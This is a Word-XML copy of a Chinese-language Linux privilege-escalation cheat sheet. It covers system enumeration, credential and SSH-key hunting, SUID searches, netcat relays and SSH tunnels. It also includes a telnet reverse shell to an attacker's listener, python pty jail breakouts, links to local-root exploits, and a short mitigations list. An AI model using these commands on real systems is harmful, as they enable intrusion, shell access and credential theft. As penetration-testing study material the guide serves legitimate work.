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A4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="288" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="62"/>
          <w:szCs w:val="62"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B74EA4">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="62"/>
          <w:szCs w:val="62"/>
        </w:rPr>
        <w:t>基本</w:t>
      </w:r>
      <w:r w:rsidRPr="00B74EA4">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="62"/>
          <w:szCs w:val="62"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B74EA4">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="62"/>
          <w:szCs w:val="62"/>
        </w:rPr>
        <w:t>权限提升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这只是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00B74EA4">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>基本而粗糙的指南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。由于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Linux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差异很大，因此并非每个命令都适用于每个系统。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“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它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”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不会跳下屏幕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-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你去寻找那个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“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小东西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”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为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“ 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魔鬼在细节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 ”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。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0" w:name="Enumeration.is.the.key."/>
      <w:bookmarkEnd w:id="0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枚举是关键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4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（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Linux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）特权提升是关于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:left="312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0D42C8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收集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- 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枚举，更多的枚举和更多的枚举。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:left="312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0D42C8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流程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- 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整理数据，分析和确定优先级。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:left="312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0D42C8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搜索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- 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知道要搜索什么以及在哪里可以找到漏洞利用代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:left="312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0D42C8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适应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- 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自定义漏洞利用程序，因此适合。并非每种漏洞都能为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“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现成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”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的每个系统工作。</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:left="312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0D42C8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尝试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- </w:t>
      </w:r>
      <w:r w:rsidRPr="000D42C8">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>为（很多）尝试和错误做好准备。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2" w:name="Operating.System"/>
      <w:bookmarkEnd w:id="2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操作系统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" w:name="What.s.the.distribution.type...em.What.v"/>
      <w:bookmarkEnd w:id="3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什么是发行类型？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什么版本的？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/issue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/*-release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lsb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-release      #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Debian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based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redhat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-release   #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Redhat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based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" w:name="What.s.the.kernel.version...em.Is.it.64-"/>
      <w:bookmarkEnd w:id="4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什么是内核版本？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是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64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位吗？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6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proc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/version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uname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-a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uname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mrs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rpm -q kernel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dmesg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Linux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ls /boot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vmlinuz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-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5" w:name="What.can.be.learnt.from.the.environmenta"/>
      <w:bookmarkEnd w:id="5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从环境变量中可以学到什么？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/profile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bashrc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bash_profile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bashrc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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bash_logout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env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set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6" w:name="Is.there.a.printer."/>
      <w:bookmarkEnd w:id="6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有打印机吗？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个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lpstat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-a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7" w:name="Applications..amp..Services"/>
      <w:bookmarkEnd w:id="7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应用与服务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8" w:name="What.services.are.running...em.Which.ser"/>
      <w:bookmarkEnd w:id="8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哪些服务正在运行？</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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哪个服务</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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具有哪个用户特权？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aux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top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/services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9" w:name="Which.service.s..are.been.running.by..em"/>
      <w:bookmarkEnd w:id="9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根目录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正在运行哪些服务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？在这些易受攻击的服务中，值得仔细检查！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aux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root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ef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root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0" w:name="What.applications.are.installed...em.Wha"/>
      <w:bookmarkEnd w:id="10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安装了哪些应用程序？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他们是什么版本？他们目前在跑步吗？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6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/bin/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dpkg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rpm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qa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/cache/apt/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archivesO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/cache/yum/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1" w:name="Any.of.the.service.s..settings.misconfig"/>
      <w:bookmarkEnd w:id="11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任何服务设置配置错误？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是否附有（脆弱的）插件？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syslog.conf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chttp.conf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/cups/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cupsd.conf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inetd.conf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/apache2/apache2.conf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conf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/opt/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lampp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^.*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r.*/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2" w:name="What.jobs.are.scheduled."/>
      <w:bookmarkEnd w:id="12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计划了哪些工作？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10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crontab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/spool/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-al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-al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at.allow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at.deny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cron.allow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cron.deny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crontab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anacrontab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/spool/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crontabs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/root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3" w:name="Any.plain.text.usernames.and.or.password"/>
      <w:bookmarkEnd w:id="13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是否有纯文本用户名和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/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或密码？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user [filename]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pass [filename]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-C 5 "password" [filename]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.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-name "*.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php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" -print0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xargs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-0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-n "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$password"   # Joomla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14" w:name="Communications..amp..Networking"/>
      <w:bookmarkEnd w:id="14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通讯与网络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5" w:name="What.NIC.s..does.the.system.have...em.Is"/>
      <w:bookmarkEnd w:id="15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系统具有哪些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NIC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它连接到另一个网络了吗？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ifconfig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-a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/network/interfaces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sysconfig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6" w:name="What.are.the.network.configuration.setti"/>
      <w:bookmarkEnd w:id="16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什么是网络配置设置？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您可以找到关于该网络的哪些信息？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DHCP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服务器？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DNS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服务器？网关？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resolv.conf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sysconfig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/networks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iptables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hostname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dnsdomainname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7" w:name="What.other.users..amp..hosts.are.communi"/>
      <w:bookmarkEnd w:id="17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其他哪些用户和主机正在与系统通信？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lsof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lsof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:80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80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/services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netstat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antup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netstat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antpx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netstat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tulpn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chkconfig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--list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chkconfig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--list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3:on</w:t>
            </w:r>
            <w:proofErr w:type="gram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last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8" w:name="Whats.cached...em.IP.and.or.MAC.addresse"/>
      <w:bookmarkEnd w:id="18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缓存了什么？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IP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和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/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或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MAC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地址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route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/route -nee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19" w:name="Is.packet.sniffing.possible..What.can.be"/>
      <w:bookmarkEnd w:id="19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数据包</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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嗅探是否</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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可能？可以看到什么？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听实时路况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个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tcpdump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tcp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dst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192.168.1.7 80 and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tcp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dst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10.5.5.252 21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lastRenderedPageBreak/>
        <w:t>注意：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tcpdump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tcp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dst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[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ip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和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tcp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dst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[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ip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0" w:name="Have.you.got.a.shell...em.Can.you.intera"/>
      <w:bookmarkEnd w:id="20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你有壳吗？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您可以与系统互动吗？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lvp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4444    # Attacker. Input (Commands)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lvp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4445    # Attacker.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Ouput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(Results)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telnet [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atackers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] 44444 | /bin/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[local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] 44445    # On the targets system. Use the attackers IP!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"http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/"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http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 : </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00B74EA4">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
            <w:i/>
            <w:iCs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//lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/</w:t>
        </w:r>
      </w:hyperlink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1" w:name="Is.port.forwarding.possible...em.Redirec"/>
      <w:bookmarkEnd w:id="21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是否可以进行端口转发？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从另一个视图重定向流量并与之交互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"http://www.boutell.com/rinetd/"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http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"http://www.boutell.com/rinetd/"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//www.boutell.com/rinetd/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"https://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch"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http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 : </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B74EA4">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
            <w:i/>
            <w:iCs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//www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch</w:t>
        </w:r>
      </w:hyperlink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"http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip"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http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 : </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00B74EA4">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
            <w:i/>
            <w:iCs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//downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip</w:t>
        </w:r>
      </w:hyperlink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FPipe.exe -l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-r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远程端口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-s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IP]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个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FPipe.exe -l 80 -r 80 -s 80 192.168.1.7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ssh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-[L / R]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：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远程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IP]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：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远程端口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本地用户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@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IP]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8080:127.0.0.1:80 root@192.168.1.7    # Local Port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-R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port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注意：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mknod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backpipe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p; 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nc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-l -p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远程端口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] &lt;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backpipe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| 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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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IP] [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本地端口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]&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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backpipe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mknod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 ;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-p 8080 &lt;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10.5.5.151 80 &gt;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# Port Relay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mknod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 ;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-p 8080 0 &amp; &lt;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tee -a inflow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localhost 80 | tee -a outflow 1&gt;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# Proxy (Port 80 to 8080)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mknod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 ;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 -p 8080 0 &amp; &lt;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tee -a inflow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localhost 80 | tee -a outflow &amp; 1&gt;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backpipe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# Proxy monitor (Port 80 to 8080)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2" w:name="Is.tunnelling.possible...em.Send.command"/>
      <w:bookmarkEnd w:id="22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可以挖隧道吗？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在本地远程发送命令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-D 127.0.0.1:9050 -N [username]@[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]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proxychains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ifconfig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23" w:name="Confidential.Information..amp..Users"/>
      <w:bookmarkEnd w:id="23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机密信息和用户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4" w:name="Who.are.you..Who.is.logged.in..Who.has.b"/>
      <w:bookmarkEnd w:id="24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你是谁？谁登录？</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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谁已经</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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登录？那里还有谁？谁能做什么？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id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who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last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passwd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cut -d: -f1    # List of users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grep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-v -E "^#"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passwd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-F: '$3 == 0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{ print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$1}'   # List of super users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-F: '($3 == "0") {print}'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passwd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# List of super users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sudoers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sudo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-l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5" w:name="What.sensitive.files.can.be.found."/>
      <w:bookmarkEnd w:id="25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可以找到哪些敏感文件？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passwd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/group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/shadow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/mail/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6" w:name="Anything..interesting..in.the.home.direc"/>
      <w:bookmarkEnd w:id="26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家庭目录有什么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“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有趣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”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的地方吗？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如果可以访问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ahlR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/root/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ahlR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/home/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7" w:name="Are.there.any.passwords.in..scripts..dat"/>
      <w:bookmarkEnd w:id="27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里面有密码吗？脚本，数据库，配置文件还是日志文件？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密码的默认路径和位置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/apache2/config.inc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/lib/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user.MYD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/root/anaconda-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ks.cfg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8" w:name="What.has.the.user.being.doing...em.Is.th"/>
      <w:bookmarkEnd w:id="28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用户正在做什么？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纯文本有密码吗？他们在编辑什么？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bash_history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nano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atftp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php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_history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29" w:name="What.user.information.can.be.found."/>
      <w:bookmarkEnd w:id="29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可以找到哪些用户信息？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bashrc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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/.profile</w:t>
            </w:r>
            <w:proofErr w:type="gram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/mail/root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/spool/mail/root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0" w:name="Can.private-key.information.be.found."/>
      <w:bookmarkEnd w:id="30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可以找到私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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信息吗？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10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authorized_keys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/identity.pub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/identity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/id_rsa.pub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id_rsa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/id_dsa.pub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~/.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id_dsa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ssh_config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sshd_config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/ssh_host_dsa_key.pub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ssh_host_dsa_key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/ssh_host_rsa_key.pub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ssh_host_rsa_key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/ssh_host_key.pub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ssh_host_key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31" w:name="File.Systems"/>
      <w:bookmarkEnd w:id="31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文件系统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2" w:name="Which.configuration.files.can.be.written"/>
      <w:bookmarkEnd w:id="32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可以在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 xml:space="preserve">/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> /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中写入哪些配置文件？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能够重新配置服务？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^.*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w.*/' 2&gt;/dev/null     # Anyone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^..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w/' 2&gt;/dev/null       # Owner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/^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.....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w/' 2&gt;/dev/null    # Group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aRl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/ |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awk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'$1 ~ /w.$/' 2&gt;/dev/null        # Other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 -readable -type f 2&gt;/dev/null               # Anyone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 -readable -type f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maxdepth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1 2&gt;/dev/null   # Anyone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3" w:name="What.can.be.found.in..var..."/>
      <w:bookmarkEnd w:id="33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在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 xml:space="preserve">/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> /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中可以找到什么？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/mail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/spool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/spool/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lpd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/lib/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pgsql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/lib/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mysql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/lib/dhcp3/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dhclient.leases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4" w:name="Any.settings.files..hidden..on.website.."/>
      <w:bookmarkEnd w:id="34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网站上是否有任何设置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/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文件（隐藏）？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有数据库信息的任何设置文件吗？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/www/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srv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/www/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htdocs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/local/www/apache22/data/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/opt/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lampp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htdocs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/www/html/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日志文件中是否有任何内容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（可以帮助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“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本地文件包括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”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！）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10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20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30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39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40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/logs/error.log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/log/apache2/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/log/apache2/access.log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/log/apache2/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/log/apache2/error.log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/log/apache/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/log/apache/access.log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/log/auth.log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/log/chttp.log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/log/cups/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/log/dpkg.log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faillog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error_log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/error.log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lastlog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/error.log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/lighttpd.access.log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lighttpd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/lighttpd.error.log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/log/messages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/log/secure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/log/syslog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wtmp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xferlog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/log/yum.log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/run/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utmp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webmin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/miniserv.log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/www/logs/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access_log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/www/logs/access.log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/lib/dhcp3/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postgresql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proftpd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alh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var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/log/samba/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Note: auth.log, boot,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btmp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daemon.log, debug,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dmesg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kern.log, mail.info, mail.log, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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mail.warn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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messages, syslog,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udev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wtmp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lastRenderedPageBreak/>
        <w:t>注意：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"http://www.thegeekstuff.com/2011/08/linux-var-log-files/"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http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：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begin"/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instrText xml:space="preserve"> HYPERLINK "http://www.thegeekstuff.com/2011/08/linux-var-log-files/" </w:instrTex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separate"/>
      </w:r>
      <w:r w:rsidRPr="00B74EA4">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="751590"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>//www.thegeekstuff.com/2011/08/linux-var-log-files/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B74EA4">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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5" w:name="If.commands.are.limited..you.break.out.o"/>
      <w:bookmarkEnd w:id="35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如果命令受到限制，您会跳出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“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监狱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”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壳吗？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python -c 'import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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pty;pty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.spawn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("/bin/bash")'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echo </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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os.system</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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('/bin/bash')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/bin/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6" w:name="How.are.file-systems.mounted."/>
      <w:bookmarkEnd w:id="36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如何安装文件系统？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mount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df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-h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7" w:name="Are.there.any.unmounted.file-systems."/>
      <w:bookmarkEnd w:id="37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是否有任何卸载的文件系统？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个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cat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etc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fstab</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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8" w:name="What..Advanced.Linux.File.Permissions..a"/>
      <w:bookmarkEnd w:id="38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使用了哪些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“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高级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Linux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文件权限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”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粘性位，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SUID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和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-1000 -type d 2&gt;/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.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-g=s -type f 2&gt;/dev/null    # SGID (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chmod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2000) - run as the group, not the user who started it.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-u=s -type f 2&gt;/dev/null    # SUID (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chmod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4000) - run as the owner, not the user who started it.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-g=s -o -perm -u=s -type f 2&gt;/dev/null    # SGID or SUID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for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in `locate -r "bin$"`; do find $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perm -4000 -o -perm -2000 \) -type f 2&gt;/dev/null; done    # Looks in 'common' places: /bin,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,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/bin,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,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/local/bin,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usr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/local/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sbin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and any other *bin, for SGID or SUID (Quicker search)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# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)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-g=s -o -perm -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4000 !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-type l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maxdepth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3 -exec ls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ld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{} \; 2&gt;/dev/null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39" w:name="Where.can.written.to.and.executed.from.."/>
      <w:bookmarkEnd w:id="39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在哪里可以写和执行？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一些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“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常见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”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位置：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/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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，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/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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，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 xml:space="preserve">/ dev / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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shm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find / -writable -type d 2&gt;/dev/null      # world-writeable folders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-222 -type d 2&gt;/dev/null     # world-writeable folders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-o w -type d 2&gt;/dev/null     # world-writeable folders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-perm -o x -type d 2&gt;/dev/null     # world-executable folders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find /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perm -o w -perm -o x \) -type d 2&gt;/dev/null   # world-writeable &amp; executable folders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0" w:name="Any..problem..files...em.Word-writeable."/>
      <w:bookmarkEnd w:id="40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lastRenderedPageBreak/>
        <w:t>任何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“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问题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”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文件吗？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Word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可写的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“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没人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”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xdev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-type d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perm -0002 -a ! -perm -1000 \) -print   # world-writeable files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dir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xdev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</w:t>
            </w:r>
            <w:proofErr w:type="gram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\( -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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nouser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-o -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nogroup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\) -print   #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Noowner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files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41" w:name="Preparation..amp..Finding.Exploit.Code"/>
      <w:bookmarkEnd w:id="41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准备和查找漏洞利用代码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2" w:name="What.development.tools.languages.are.ins"/>
      <w:bookmarkEnd w:id="42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安装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/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支持哪些开发工具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/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语言？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perl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-name python*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gcc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-name cc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3" w:name="How.can.files.be.uploaded."/>
      <w:bookmarkEnd w:id="43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如何上传文件？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wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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nc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netcat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find / -name </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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tftp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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*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find / -name ftp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4" w:name="Finding.exploit.code"/>
      <w:bookmarkEnd w:id="44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查找漏洞利用代码</w:t>
      </w:r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8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http://www.exploit-db.com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9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http://1337day.com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0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http://www.securiteam.com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1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http://www.securityfocus.com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2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http://www.exploitsearch.net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3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http://metasploit.com/modules/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4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http://securityreason.com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5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http://seclists.org/fulldisclosure/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6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http://www.google.com</w:t>
        </w:r>
      </w:hyperlink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5" w:name="Finding.more.information.regarding.the.e"/>
      <w:bookmarkEnd w:id="45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查找有关漏洞利用的更多信息</w:t>
      </w:r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7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http://www.cvedetails.com</w:t>
        </w:r>
      </w:hyperlink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http://packetstormsecurity.org/files/cve/[CVE]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http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]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http://www.vulnview.com/cve-details.php?cvename=[CVE]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6" w:name="L.Quick...Common..exploits...em.Warning."/>
      <w:bookmarkEnd w:id="46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（快速）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“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常见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”</w:t>
      </w:r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漏洞。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警告。预编译的二进制文件。使用风险自负</w:t>
      </w:r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8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http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/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19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http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/</w:t>
        </w:r>
      </w:hyperlink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47" w:name="Mitigations"/>
      <w:bookmarkEnd w:id="47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缓解措施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8" w:name="Is.any.of.the.above.information.easy.to."/>
      <w:bookmarkEnd w:id="48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是否容易找到以上任何信息？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4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试试吧！设置可自动执行脚本和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/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或第三方产品的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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作业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49" w:name="Is.the.system.fully.patched."/>
      <w:bookmarkEnd w:id="49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系统是否已完全打补丁？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内核，操作系统，所有应用程序，其插件和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Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00B74EA4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服务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B74EA4" w:rsidRPr="00B74EA4" w:rsidTr="00B74E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apt-get update &amp;&amp; apt-get upgrade</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74E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B74EA4">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"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yum update</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:cs="宋体"/>
                <w:color w:val="93A1A1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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50" w:name="Are.services.running.with.the.minimum.le"/>
      <w:bookmarkEnd w:id="50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服务是否以最低特权级别运行？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4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例如，您是否需要以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root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用户身份运行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MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B74EA4">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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51" w:name="Scripts..em.Can.any.of.this.be.automated"/>
      <w:bookmarkEnd w:id="51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脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00B74EA4">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>可以自动化吗？</w:t>
      </w:r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0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http://pentestmonkey.net/tools/unix-privesc-check/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1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http://labs.portcullis.co.uk/application/enum4linux/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2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http://bastille-linux.sourceforge.net</w:t>
        </w:r>
      </w:hyperlink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</w:pPr>
      <w:bookmarkStart w:id="52" w:name="Other..quick..guides..amp..Links"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidRPr="00B74EA4">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>其他（快速）指南和链接</w:t>
      </w:r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53" w:name="Enumeration"/>
      <w:bookmarkEnd w:id="53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列举</w:t>
      </w:r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3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http://www.0daysecurity.com/penetration-testing/enumeration.html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4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http://www.microloft.co.uk/hacking/hacking3.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="00B74EA4" w:rsidP="00B74EA4">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="24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</w:pPr>
      <w:bookmarkStart w:id="54" w:name="Misc"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidRPr="00B74EA4">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="宋体" w:hAnsi="Georgia" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>杂项</w:t>
      </w:r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5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http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf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6" w:history="1">
        <w:r w:rsidR="00B74EA4" w:rsidRPr="00B74EA4">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
            <w:color w:val="0181EB"/>
            <w:kern w:val="0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B74EA4" w:rsidRPr="00B74EA4" w:rsidRDefault="000D42C8" w:rsidP="00B74EA4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 w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00B74EA4" w:rsidRPr="00B74EA4">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
            <w:color w:val="751590"/>
            <w:kern w:val="0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
